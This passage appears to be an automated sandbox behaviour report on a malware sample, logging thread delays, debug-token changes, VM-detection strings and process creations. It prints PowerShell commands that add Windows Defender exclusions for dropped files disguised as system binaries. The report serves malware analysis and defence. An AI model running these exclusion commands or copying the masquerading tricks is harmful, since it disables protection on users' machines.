                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ModemLogs\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\xKVBpkhCEjg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 30000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 600000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599797
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 599219
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 3600000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598844
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 598344
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597797
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 597375
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596344
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 596031
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595779
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595546
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 595250
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594953
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 594594
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593781
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 593078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 592578
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 592297
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 591156
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590828
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590438
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 590125
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 589609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 588547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 588156
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587844
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 587078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 586609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 300000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585734
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585484
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 585172
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 584734
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 584328
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583896
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583422
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 583078
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582840
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582594
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582465
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582336
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582187
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 582068
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581938
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581781
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581656
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581494
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581321
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581203
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 581068
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580938
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580828
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580715
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580547
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580421
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580282
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580124
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 580000
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579885
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579739
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579609
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579476
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579359
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579250
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579139
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 579017
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578891
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578741
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578605
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578440
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578322
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578219
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 578098
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577955
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577813
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577578
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 577016
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576887
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576772
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576648
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576513
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576314
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 576176
                              Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
                              Source: w32tm.exe, 0000002E.00000002.1805940430.000002827BCA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                              Source: s5duotgoYD.exe, 00000000.00000002.1843977314.000000001C2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef|
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeProcess token adjusted: Debug
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeProcess token adjusted: Debug
                              Source: C:\Windows\ModemLogs\conhost.exeProcess token adjusted: Debug
                              Source: C:\Windows\ModemLogs\conhost.exeProcess token adjusted: Debug
                              Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess token adjusted: Debug
                              Source: C:\Recovery\xKVBpkhCEjg.exeProcess token adjusted: Debug
                              Source: C:\Recovery\xKVBpkhCEjg.exeProcess token adjusted: Debug
                              Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeQueries volume information: C:\Users\user\Desktop\s5duotgoYD.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
